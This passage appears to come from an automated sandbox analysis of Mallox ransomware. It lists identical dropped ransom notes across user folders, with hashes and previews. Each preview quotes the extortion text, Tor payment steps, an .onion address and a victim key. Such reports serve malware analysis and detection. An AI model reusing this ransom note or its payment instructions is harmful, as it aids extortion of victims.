                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Desktop\NYMMPCEIMA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Desktop\PALRGUCVEH\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Desktop\VWDFPKGDUF\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Documents\BJZFPPWAPT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Documents\EIVQSAOTAQ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Documents\EWZCVGNOWT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Documents\GRXZDKKVDB\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Documents\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Documents\LIJDSFKJZG\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Documents\NWCXBPIUYI\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Documents\NYMMPCEIMA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Documents\PALRGUCVEH\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Documents\VWDFPKGDUF\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Downloads\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Favorites\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Favorites\Links\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Links\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Music\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
